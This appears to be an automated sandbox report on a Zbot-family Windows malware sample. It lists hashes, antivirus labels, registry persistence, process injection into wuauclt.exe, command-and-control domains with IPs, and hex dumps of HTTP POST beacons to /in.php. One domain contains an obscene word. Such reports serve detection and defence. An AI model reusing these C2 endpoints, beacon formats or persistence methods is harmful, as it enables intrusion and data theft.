Analysis Date2014-02-20 18:00:40
MD5085e59e1816a4089a05c67769d8c89d1
SHA1541c802b45b95db491db7c02fe50c54fa481c038

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: e98ce3d4b15fd44ea6f576f7c89fe050 sha1: eb1890579012bfd7d6dc6baeec0c757090af9c66 size: 199680
Section.rdata md5: 3ce2e15f43435e0e98f21ff1ae26d8c5 sha1: 1fb7c6534e6e1973eb1124c242efd90e32a76728 size: 59904
Section.data md5: 8180ba10727964551be51c93da36bd0b sha1: facf449fd401e1fd40e04eab77344ac7f0191bc7 size: 29696
Section.reloc md5: 2bf797ee082907af362a63a4dfc73917 sha1: feee281ba3b0b7cb832f589b1c4fa1b50b9ca3a5 size: 8704
Sectionglpoept md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Timestamp2004-07-07 00:10:50
Pdb pathd:\enter\Against\verb\my\stick\consonant\start\summerplease.pdb
PackerMicrosoft Visual C++ ?.?
PEhash51b1907df35bdd71dfad0b24033380359cdb5b29
IMPhashdc30004d7554212a9764e7d3d60dbd50
AVavgDownloader.Generic13.AMZR
AVaviraTR/Crypt.ZPACK.Gen
AVmcafeePWSZbot-FDM!085E59E1816A

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\00E35EEE ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\ImageBase ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\01.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\MSI\msiexec.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\01.tmp
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\MSI\msiexec.exe"

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\MSI\msiexec.exe"

Creates ProcessC:\WINDOWS\system32\wuauclt.exe

Process
↳ C:\WINDOWS\system32\wuauclt.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝
C:\Documents and Settings\All Users\Local Settings\Temp\mspiinp.com\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden ➝
NULL
RegistryHKEY_CURRENT_USER\Software\IMAGE_FILE_HEADER ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\All Users\Local Settings\Temp\mspiinp.com
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\03.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\02.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\04.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\MSI\msiexec.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex3227095050
Creates MutexTLS
Winsock DNSimg.suckmycocklameavindustry.in
Winsock DNSpe.suckmycocklameavindustry.in
Winsock DNSsc.suckmycocklameavindustry.in

Network Details:

DNSwww.update.microsoft.com.nsatc.net
Type: A
157.56.96.156
DNSxdqzpbcgrvkj.ru
Type: A
195.22.26.252
DNSxdqzpbcgrvkj.ru
Type: A
195.22.26.253
DNSxdqzpbcgrvkj.ru
Type: A
195.22.26.254
DNSxdqzpbcgrvkj.ru
Type: A
195.22.26.231
DNSpe.suckmycocklameavindustry.in
Type: A
50.116.32.177
DNSsc.suckmycocklameavindustry.in
Type: A
50.116.32.177
DNSimg.suckmycocklameavindustry.in
Type: A
50.116.32.177
DNSanam0rph.su
Type: A
195.22.26.253
DNSanam0rph.su
Type: A
195.22.26.231
DNSanam0rph.su
Type: A
195.22.26.254
DNSanam0rph.su
Type: A
195.22.26.252
DNSorzdwjtvmein.in
Type: A
195.22.26.253
DNSorzdwjtvmein.in
Type: A
195.22.26.254
DNSorzdwjtvmein.in
Type: A
195.22.26.252
DNSorzdwjtvmein.in
Type: A
195.22.26.231
DNSygiudewsqhct.in
Type: A
195.22.26.231
DNSygiudewsqhct.in
Type: A
195.22.26.252
DNSygiudewsqhct.in
Type: A
195.22.26.253
DNSygiudewsqhct.in
Type: A
195.22.26.254
DNSbdcrqgonzmwuehky.nl
Type: A
195.22.26.253
DNSbdcrqgonzmwuehky.nl
Type: A
195.22.26.252
DNSbdcrqgonzmwuehky.nl
Type: A
195.22.26.254
DNSbdcrqgonzmwuehky.nl
Type: A
195.22.26.231
DNSsomicrososoft.ru
Type: A
64.90.187.138
DNSwww.update.microsoft.com
Type: A
HTTP POSThttp://xdqzpbcgrvkj.ru/in.php
User-Agent: Mozilla/4.0
HTTP GEThttp://pe.suckmycocklameavindustry.in/rqyfmlsahgnucbipxvdkrqyfmlsahgnf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://sc.suckmycocklameavindustry.in/fmtsahonucjipxedkrzyfmtsahomkrpo
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://img.suckmycocklameavindustry.in/ucjipxedkrzyfmtsahonucjipxedbhgn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://anam0rph.su/in.php
User-Agent: Mozilla/4.0
HTTP POSThttp://orzdwjtvmein.in/in.php
User-Agent: Mozilla/4.0
HTTP POSThttp://ygiudewsqhct.in/in.php
User-Agent: Mozilla/4.0
HTTP POSThttp://bdcrqgonzmwuehky.nl/in.php
User-Agent: Mozilla/4.0
HTTP POSThttp://somicrososoft.ru/in.php
User-Agent: Mozilla/4.0
Flows TCP192.168.1.1:1031 ➝ 157.56.96.156:80
Flows UDP192.168.1.1:1032 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1034 ➝ 195.22.26.252:80
Flows UDP192.168.1.1:1035 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1036 ➝ 50.116.32.177:80
Flows TCP192.168.1.1:1037 ➝ 50.116.32.177:80
Flows TCP192.168.1.1:1038 ➝ 50.116.32.177:80
Flows TCP192.168.1.1:1039 ➝ 195.22.26.253:80
Flows UDP192.168.1.1:1040 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1041 ➝ 195.22.26.253:80
Flows UDP192.168.1.1:1042 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1043 ➝ 195.22.26.231:80
Flows UDP192.168.1.1:1044 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1045 ➝ 195.22.26.253:80
Flows UDP192.168.1.1:1046 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1047 ➝ 64.90.187.138:80

Raw Pcap
0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20786471   P/1.1..Host: xdq
0x00000020 (00032)   7a706263 6772766b 6a2e7275 0d0a5573   zpbcgrvkj.ru..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 300d0a43 6f6e7465 6e742d54   a/4.0..Content-T
0x00000050 (00080)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000060 (00096)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000070 (00112)   6e636f64 65640d0a 436f6e74 656e742d   ncoded..Content-
0x00000080 (00128)   4c656e67 74683a20 38340d0a 436f6e6e   Length: 84..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x000000a0 (00160)   0a757071 63684373 38764654 4b464f56   .upqchCs8vFTKFOV
0x000000b0 (00176)   6d6e494b 47497769 4c72486f 33567436   mnIKGIwiLrHo3Vt6
0x000000c0 (00192)   38543379 71766851 75325471 6574516e   8T3yqvhQu2TqetQn
0x000000d0 (00208)   33714979 37513662 70546644 5574594d   3qIy7Q6bpTfDUtYM
0x000000e0 (00224)   5676706e 794d7877 444a6773 67396d59   VvpnyMxwDJgsg9mY
0x000000f0 (00240)   3371773d 3d                           3qw==

0x00000000 (00000)   47455420 2f727179 666d6c73 6168676e   GET /rqyfmlsahgn
0x00000010 (00016)   75636269 70787664 6b727179 666d6c73   ucbipxvdkrqyfmls
0x00000020 (00032)   6168676e 66204854 54502f31 2e310d0a   ahgnf HTTP/1.1..
0x00000030 (00048)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000040 (00064)   6570742d 456e636f 64696e67 3a20677a   ept-Encoding: gz
0x00000050 (00080)   69702c20 6465666c 6174650d 0a557365   ip, deflate..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x000000a0 (00160)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x000000b0 (00176)   37323729 0d0a486f 73743a20 70652e73   727)..Host: pe.s
0x000000c0 (00192)   75636b6d 79636f63 6b6c616d 65617669   uckmycocklameavi
0x000000d0 (00208)   6e647573 7472792e 696e0d0a 436f6e6e   ndustry.in..Conn
0x000000e0 (00224)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f666d74 7361686f 6e75636a   GET /fmtsahonucj
0x00000010 (00016)   69707865 646b727a 79666d74 7361686f   ipxedkrzyfmtsaho
0x00000020 (00032)   6d6b7270 6f204854 54502f31 2e310d0a   mkrpo HTTP/1.1..
0x00000030 (00048)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000040 (00064)   6570742d 456e636f 64696e67 3a20677a   ept-Encoding: gz
0x00000050 (00080)   69702c20 6465666c 6174650d 0a557365   ip, deflate..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x000000a0 (00160)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x000000b0 (00176)   37323729 0d0a486f 73743a20 73632e73   727)..Host: sc.s
0x000000c0 (00192)   75636b6d 79636f63 6b6c616d 65617669   uckmycocklameavi
0x000000d0 (00208)   6e647573 7472792e 696e0d0a 436f6e6e   ndustry.in..Conn
0x000000e0 (00224)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f75636a 69707865 646b727a   GET /ucjipxedkrz
0x00000010 (00016)   79666d74 7361686f 6e75636a 69707865   yfmtsahonucjipxe
0x00000020 (00032)   64626867 6e204854 54502f31 2e310d0a   dbhgn HTTP/1.1..
0x00000030 (00048)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000040 (00064)   6570742d 456e636f 64696e67 3a20677a   ept-Encoding: gz
0x00000050 (00080)   69702c20 6465666c 6174650d 0a557365   ip, deflate..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x000000a0 (00160)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x000000b0 (00176)   37323729 0d0a486f 73743a20 696d672e   727)..Host: img.
0x000000c0 (00192)   7375636b 6d79636f 636b6c61 6d656176   suckmycocklameav
0x000000d0 (00208)   696e6475 73747279 2e696e0d 0a436f6e   industry.in..Con
0x000000e0 (00224)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000f0 (00240)   6976650d 0a0d0a                       ive....

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20616e61   P/1.1..Host: ana
0x00000020 (00032)   6d307270 682e7375 0d0a5573 65722d41   m0rph.su..User-A
0x00000030 (00048)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000040 (00064)   300d0a43 6f6e7465 6e742d54 7970653a   0..Content-Type:
0x00000050 (00080)   20617070 6c696361 74696f6e 2f782d77    application/x-w
0x00000060 (00096)   77772d66 6f726d2d 75726c65 6e636f64   ww-form-urlencod
0x00000070 (00112)   65640d0a 436f6e74 656e742d 4c656e67   ed..Content-Leng
0x00000080 (00128)   74683a20 38340d0a 436f6e6e 65637469   th: 84..Connecti
0x00000090 (00144)   6f6e3a20 636c6f73 650d0a0d 0a757071   on: close....upq
0x000000a0 (00160)   63684373 38764654 4b464f56 6d6e494b   chCs8vFTKFOVmnIK
0x000000b0 (00176)   47497769 4c72486f 33567436 38543379   GIwiLrHo3Vt68T3y
0x000000c0 (00192)   71766851 75325471 6574516e 33714979   qvhQu2TqetQn3qIy
0x000000d0 (00208)   37513662 70546644 5574594d 5676706e   7Q6bpTfDUtYMVvpn
0x000000e0 (00224)   794d7877 444a6773 67396d59 3371773d   yMxwDJgsg9mY3qw=
0x000000f0 (00240)   3d76650d 0a0d0a                       =ve....

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 206f727a   P/1.1..Host: orz
0x00000020 (00032)   64776a74 766d6569 6e2e696e 0d0a5573   dwjtvmein.in..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 300d0a43 6f6e7465 6e742d54   a/4.0..Content-T
0x00000050 (00080)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000060 (00096)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000070 (00112)   6e636f64 65640d0a 436f6e74 656e742d   ncoded..Content-
0x00000080 (00128)   4c656e67 74683a20 38340d0a 436f6e6e   Length: 84..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x000000a0 (00160)   0a757071 63684373 38764654 4b464f56   .upqchCs8vFTKFOV
0x000000b0 (00176)   6d6e494b 47497769 4c72486f 33567436   mnIKGIwiLrHo3Vt6
0x000000c0 (00192)   38543379 71766851 75325471 6574516e   8T3yqvhQu2TqetQn
0x000000d0 (00208)   33714979 37513662 70546644 5574594d   3qIy7Q6bpTfDUtYM
0x000000e0 (00224)   5676706e 794d7877 444a6773 67396d59   VvpnyMxwDJgsg9mY
0x000000f0 (00240)   3371773d 3d0d0a                       3qw==..

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20796769   P/1.1..Host: ygi
0x00000020 (00032)   75646577 73716863 742e696e 0d0a5573   udewsqhct.in..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 300d0a43 6f6e7465 6e742d54   a/4.0..Content-T
0x00000050 (00080)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000060 (00096)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000070 (00112)   6e636f64 65640d0a 436f6e74 656e742d   ncoded..Content-
0x00000080 (00128)   4c656e67 74683a20 38340d0a 436f6e6e   Length: 84..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x000000a0 (00160)   0a757071 63684373 38764654 4b464f56   .upqchCs8vFTKFOV
0x000000b0 (00176)   6d6e494b 47497769 4c72486f 33567436   mnIKGIwiLrHo3Vt6
0x000000c0 (00192)   38543379 71766851 75325471 6574516e   8T3yqvhQu2TqetQn
0x000000d0 (00208)   33714979 37513662 70546644 5574594d   3qIy7Q6bpTfDUtYM
0x000000e0 (00224)   5676706e 794d7877 444a6773 67396d59   VvpnyMxwDJgsg9mY
0x000000f0 (00240)   3371773d 3d0d0a                       3qw==..

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20626463   P/1.1..Host: bdc
0x00000020 (00032)   7271676f 6e7a6d77 7565686b 792e6e6c   rqgonzmwuehky.nl
0x00000030 (00048)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000040 (00064)   7a696c6c 612f342e 300d0a43 6f6e7465   zilla/4.0..Conte
0x00000050 (00080)   6e742d54 7970653a 20617070 6c696361   nt-Type: applica
0x00000060 (00096)   74696f6e 2f782d77 77772d66 6f726d2d   tion/x-www-form-
0x00000070 (00112)   75726c65 6e636f64 65640d0a 436f6e74   urlencoded..Cont
0x00000080 (00128)   656e742d 4c656e67 74683a20 38340d0a   ent-Length: 84..
0x00000090 (00144)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x000000a0 (00160)   650d0a0d 0a757071 63684373 38764654   e....upqchCs8vFT
0x000000b0 (00176)   4b464f56 6d6e494b 47497769 4c72486f   KFOVmnIKGIwiLrHo
0x000000c0 (00192)   33567436 38543379 71766851 75325471   3Vt68T3yqvhQu2Tq
0x000000d0 (00208)   6574516e 33714979 37513662 70546644   etQn3qIy7Q6bpTfD
0x000000e0 (00224)   5574594d 5676706e 794d7877 444a6773   UtYMVvpnyMxwDJgs
0x000000f0 (00240)   67396d59 3371773d 3d                  g9mY3qw==

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20736f6d   P/1.1..Host: som
0x00000020 (00032)   6963726f 736f736f 66742e72 750d0a55   icrososoft.ru..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038340d 0a436f6e   -Length: 84..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 73387646 544b464f   ..upqchCs8vFTKFO
0x000000b0 (00176)   566d6e49 4b474977 694c7248 6f335674   VmnIKGIwiLrHo3Vt
0x000000c0 (00192)   36385433 79717668 51753254 71657451   68T3yqvhQu2TqetQ
0x000000d0 (00208)   6e337149 79375136 62705466 44557459   n3qIy7Q6bpTfDUtY
0x000000e0 (00224)   4d567670 6e794d78 77444a67 7367396d   MVvpnyMxwDJgsg9m
0x000000f0 (00240)   59337177 3d3d773d 3d                  Y3qw==w==


Strings
.
.
..
..
.
..^
...su
@}
3!....G
0
.CC
 
.
C
y
.
...
.
Ael.
'_bc
dApS
dcD$
G.ll
                                 H
         (((((                  H
         h((((                  H
LgcC@
lPoT
l@ t
m.@/
n@oj
(null)
nV_e
?og_
rat@
rhPx
Sleep
?_V.
= =$=@=\=`=
                          
;%;,;\;
$0(0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
$0)0/050;0A0F0K0Q0W0]0c0h0m0s0y0
000P0l0p0
0-030>0D0J0x0~0
0(1.1;1@1K1n1t1y1
0	1[1a1
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0171=1
>0>6>E>K>X>
0A@@Ju
$0$b WO
;0E0m0
>0?N?l?
0$$r/A
0SSSSS
$0$UTrU
0WWWWW
1	282A2M2
	`1*NM$$
1nMbGG
1Z1`1d1h1l1
2%2;2O2U2c2p2}2
272=2H2T2i2o2
2J2Z2u2
$$2$M:
2O2h2o2w2|2
$$ 3$$
3%3+373F3L3U3a3o3u3
3^3d3h3l3p3
$$3GIG
{3GjEj
?3?Q?X?\?`?d?h?l?p?t?
.@3r@.
3.w<kG
;%<.<4<
4$4*474A4L4\4o4
4'484C4Q4_4f4u4
4%4T4Z4
464@4I4T4i4p4v4
4~f9.u
$4$GG6
4N5q5{5
4WUU_o
50$$wt
5$5,545<5D5 6(6
5'5.5H5R5h5r5
5-6g6~6
^$5AMM
5B5L5U5x5
=5===C=H=U=[=f=r=x=
5$$nUU
=.=5=N=Z=g=n=
5oSQr	3
?$?5?q?
60A0\0c0h0l0p0
6#6+61686>6E6K6S6Z6_6g6p6|6
6 6&62676x8
6!797D7h7q7x7
<$<6<?<E<K<W<f<
6UU)O/
6X{Q3}
$$7$$$
708=8G8U8^8h8
7+717:7M7q7
7$7.767A7q7
7 7&7-747;7B7I7P7W7_7g7o7{7
7,7I7O7k7
$7$$.^&!ev$
;-<7<F<~<
<(=.=7=>=I=U=
;#;-;7;<;N;X;g;t;~;
7u$6z$
7uAuu*uuu
858H8a8s8
8$828=8
8"8(8.8=8Z8
=(>8>H>X>h>
8I9O9h9n9
8.;?;_;m;
8Pe3-	
8SS%GG~
8uu=iuu%GG
:{9+>_
94<$=P>w>
9$$6UUU
9%9B9H9S9X9`9f9p9w9
9@H~So
9jjSI2
"9jjVMMu%u
$$9lESS
9 :=:`:m:y:
aaeLIw
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
a$$d[$$
$aE$$$
A$$"jj$
An application has made an attempt to load the C runtime library incorrectly.
-ao2$E$$V
$$!aoGGU
ap?Cde.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
%~a^UU
BBFFf;
%$$bGG
BGGE$$
bj$N,$
bMSSG 
}$$"#C
c6UUulmu
>/?C?d?j?
C@@@dV
$Cg$uH
cit en
_cjjy0$
cJMv$$,uu
CloseHandle
CoInitialize
CONOUT$
CopyFileW
CoRegisterClassObject
CoRegisterSurrogate
CorExitProcess
CoUninitialize
c$@@r?
CreateDirectoryW
CreateFileA
- CRT not initialized
$$$cUa?U
cUUjofj
CUU/@UUUO
CW$$5$
_Cxitv/
CXM'+M
@.data
dddd, MMMM dd, yyyy
December
DecodePointer
DeleteCriticalSection
d:\enter\Against\verb\my\stick\consonant\start\summerplease.pdb
d@@Gnsi
%.dh'H~
 Dhora
 dicEn  
Dispatch@@@ATL@@
$$d;MM
d==MMkMq
DOMAIN error
DSSUmU
@d_@te
DUUSwS
d$	w+$
:+:?:E:
$$$eDA$
e$$$hT$
e-ICse
E~iFGG
eiorael
>:>@>E>K>R>h>t>
$e$MM$
EncodePointer
EnterCriticalSection
eqQ3};
esAM/_
ESP@Sj
Euu|ASS
EUUL$$+Y
ExitProcess
$(;$$f
f5MM<f
@@f98u
February
F\=HuD
!~?Fjj
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
?F?L?Y?l?
$f$Ms{
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
f(s Ro
$FW$W_
G^4bbX
G7.G<a
GetACP
GetActiveWindow
GetCommandLineA
GetCommandLineW
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetStartupInfoW
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemInfo
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersionExA
GfG$fY
^$$*g[G
=GG8l(
GGGA,G
GG;GGM&%
GGGNBMM
,$G	GI
$$<GGiE
GGj1Jj
GGJGG~[
GGjGUU
GG~l=uu9
GGM#iMS
GGNNUMM
$GGt$$
GG?$$V
GGY(SS
GGZsUU
Gj8#j+MM
$$GKG$*Z$
glpoept
.G#_MM
Go=GGj
goN$$L
$$g)SS
GST*	SU
~GUlUUU*
GutQuMMX
GvGSSp
GvGuSu
GYGSSS
`h````
h$$^$$
$$H9MM
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
hGGVhMM
>(>H>h>
?$?(?H?h?
`h`hhh
HH:mm:ss
$$hISS%>
Hjjj_2j
hMMFM4
hP)eYVl
hpUUp$$ 
I2F$$o
I/C/Wo
 iHl s
ILonoC
iM"mMM
InitializeCriticalSection
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
ioI aan
ipd?Cri
iR$nlUV
IsDebuggerPresent
is ds 
IsValidCodePage
/IUU2m
,?IU?U$`k$
Iu"[UU
$$iW|i}+$
;J^%:.
j4jGGo
j4/juu
JanFebMarAprMayJunJulAugSepOctNovDec
January
jcjS>AS
_jG5wG
$J$Gh9G
JI<]~GG
``[j;j
jj4?MM
jj$,G$
=jjh0GGU)1VUG
jj!MMx
jj*PUU
j,	jSc
,jjSF$$
jj${s$S
>jju\jj
j&juu`$$
+jj?UU
j<#jUU
j@j ^V
jjY"$$	
{jjy`UU
;j<l>~>
/J=NMM
jOj$+$
-jQx6S
#jSIZS}Ci
%jSS'5
j"^SSSSS
ju9uHUUL
jUjj6hj$
jUUx?$$
jUwUSS
J$YUUYhz
$K1MM8
k8MM~ 
kernel32.dll
KERNEL32.dll
KERNEL32.DLL
KGGZ$$
$$k&l$
`KMMjgj
$$KSS4
$$$Kv$M
l@@c@apA
LCMapStringA
LCMapStringW
leAVAn.xT
LeaveCriticalSection
$$l#$jj
$$Ljj$
l$_o6@
LoadLibraryA
@l@o/A@t
<%<L<u<
;lUU$.
l$wg4$$=$
$*l$$Xm$
M0MM_6GGM
M0$$,zMM
$M5jp+T
M6M$$?1
M74MMM
M$$a$$
MessageBoxA
MGOMUU	
MHFM$Y
Microsoft Visual C++ Runtime Library
Mi$M$$
MI;M$$ 
.mixcrt
Mjj^:$$
Mj$jG/G$$
:|$$M~M
$$=\MM
M$}M$]
MM$~	$
MM$|$$#~
MM$0x$
MM6M*M
MMa#'$$$
MM/dd/yy
`MM(f$$
MMGDOG
MMg"U(
MMGVGUfU1
MMI;jj(
MMIUGG*
MMjOt*j
MM.kUU
MML&$'
MMMEMjL
MM;MMv
&mMMuOu
@MMNH$$,UU
MMnSS\/
]MMOnUU
$$'MMp
MMPU$$
MM{q$$
MMQ,$$
MMQ$$M|
MMr+MM
MMrMMo
mMSSan
MM SSH
MM!TSS{c
]MM u\
MMU1hx
$M^}MUo
MM]UUn
MMU+UU
M.)MUUzM
MMW\jjO
MMwUUj;ajML
MNM$$F
Monday
mscoree.dll
[M$$s=H
Mu3MG8/G
m$$uhu
MultiByteToWideChar
MUU{4GG
M~uui.
mUU_rfz!
mvhlI?c
$MvMMM
\M$$W\
MXMS$SMM1
$$MyZM
MZaMGS
MZM$[f
nDni  
$neoIlV
n$eu$G1
Ng||:\
$$<NGG
nhk   
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
$n$SjS
(null)
=$>N>x>
October
`@oJtCa
ole32.dll
OleInitialize
OleSetContainedObject
OleUninitialize
$$)OMM,
$$OMM@ 
ooIs_n
$O|$SS
outxlto
O$+{UU
p1t1x1|1
Pc(($$
Please contact the application's support team for more information.
PLu\sh
$$$:pMM
PMM@{$$
PPPPPPPP
PrepareTape
Program: 
<program name unknown>
- pure virtual function call
QMMb{u
:Q;];p;
QQSVWh
Q.SM3M
QueryPerformanceCounter
`.rdata
rehdkr L
.reloc
ResetEvent
rMMu'?u
RtlUnwind
r@tVs@
ru$d$$$2B
runtime error 
Runtime Error!
$$Rwuu
$$@$$S;
Sa%SM>
Saturday
sd Hcu
September
s@@et@@@
SetFilePointer
SetHandleCount
SetLastError
SetStdHandle
